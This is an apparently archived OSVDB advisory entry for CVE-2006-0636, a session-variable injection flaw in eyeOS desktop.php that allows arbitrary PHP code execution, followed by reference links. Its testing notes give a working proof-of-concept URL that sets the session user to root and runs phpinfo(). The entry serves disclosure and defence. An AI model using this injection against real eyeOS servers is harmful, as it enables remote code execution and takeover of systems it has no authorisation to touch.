eyeOS desktop.php _SESSION Handling Arbitrary PHP Code Execution

2006-02-07T03:17:38
ID OSVDB:23002
Type osvdb
Reporter OSVDB
Modified 2006-02-07T03:17:38

Description

Manual Testing Notes

http://[target]/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION[usr]=root&_SESSION[apps][eyeOptions.eyeapp][wrapup]=phpinfo();

References:

Vendor URL: http://www.eyeos.org/
Security Tracker: 1015609
Secunia Advisory ID: 18757
Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00096-02072006
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0101.html
ISS X-Force ID: 24569
FrSIRT Advisory: ADV-2006-0466
CVE-2006-0636